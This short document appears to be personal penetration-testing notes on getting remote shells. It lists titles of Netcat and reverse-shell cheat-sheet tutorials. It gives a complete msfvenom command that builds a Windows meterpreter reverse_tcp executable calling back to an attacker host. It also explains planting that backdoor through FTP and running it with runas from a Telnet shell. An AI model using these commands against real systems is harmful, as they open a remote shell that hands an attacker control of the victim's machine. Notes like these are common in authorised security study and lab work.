Netcat

Hacking with Netcat part 2: Bind and reverse shells - Hacking Tutorials

Reverse Shell Cheat Sheet

Reverse Shell Cheat Sheet

Msfvenom

<aside> 💡 Might have to play around with the payload to get a stable session. Make note of which payloads are actually supported on the target system.

</aside>

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f exe > msf_reverse.exe

Creating a Payload with Msfvenom - Security Tutorials

Msfvenom Cheat Sheet - Wide Security

FTP Backdoor

Can also upload backdoor via FTP client to Server and then execute from Telnet shell on Server.

Telnet C:\\inetpub\\ftproot> runas /user:netadmin msf_reverse.exe